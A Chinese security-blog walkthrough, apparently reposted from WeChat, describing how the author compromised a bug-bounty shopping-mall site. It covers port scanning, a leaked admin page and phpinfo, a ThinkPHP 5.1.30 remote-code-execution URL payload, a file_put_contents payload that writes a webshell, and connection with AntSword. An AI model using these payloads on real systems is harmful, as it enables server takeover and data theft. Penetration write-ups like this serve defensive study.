【攻防实战】手把手带你拿下SRC购物商城

admin 2025年5月20日02:56:22评论4 views字数 1029阅读3分25秒阅读模式

「信息收集」

「端口扫描」

首先使用端口扫描工具nmap对该站点进行端口扫描

nmap -T4 -A  -p 1-65535
【攻防实战】手把手带你拿下SRC购物商城

可以看到目标系统开放22、80、888、3306、8800端口

「敏感文件扫描」

之后使用文件扫描工具该站点进行敏感文件扫描

【攻防实战】手把手带你拿下SRC购物商城
http://x.x.x/admin/login.html

这里成功发现泄露的后台登陆地址

【攻防实战】手把手带你拿下SRC购物商城

「漏洞挖掘」

「phpinfo信息泄露」

根据上面敏感文件扫描发现该站点存在phpinfo信息泄露,根据相关信息获取此站点为Linux系统

【攻防实战】手把手带你拿下SRC购物商城

「CMS信息确认」

可以直接访问该站点

http://x.x.x/admin/login.html

根据网站logo可判断是Thinkphp

【攻防实战】手把手带你拿下SRC购物商城

也可以使其报错,也能看出,并回显具体版本,可以看到ThinkPHP版本,发现版本号为v5.1.30

http://x.x.x/inde
【攻防实战】手把手带你拿下SRC购物商城

「Thinkphp代码执行Getshell」

漏洞扫描

使用Thinkphp代码执行漏洞工具对该站点进行漏洞扫描,发现该站点存在以下漏洞

【攻防实战】手把手带你拿下SRC购物商城

命令执行

手动对上面工具的漏洞扫描结果进行确认

http://x.x.x/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

可以看到成功执行了命令

【攻防实战】手把手带你拿下SRC购物商城

写入shell

之后尝试对该站点写入webshell

http:///index.php?s=home/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=x.php&vars[1][1]=xxx
【攻防实战】手把手带你拿下SRC购物商城

蚁剑连接

【攻防实战】手把手带你拿下SRC购物商城

因为这时间,按传统功夫的点到为止已经打到点了,如果继续打内网,一拳就把他内网打穿了,进到他的内网里没有继续打他。

「攻防交流群」

【攻防实战】手把手带你拿下SRC购物商城

「声明」

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(儒道易行):【攻防实战】手把手带你拿下SRC购物商城

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月20日02:56:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【攻防实战】手把手带你拿下SRC购物商城http://cn-sec.com/archives/4082972.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息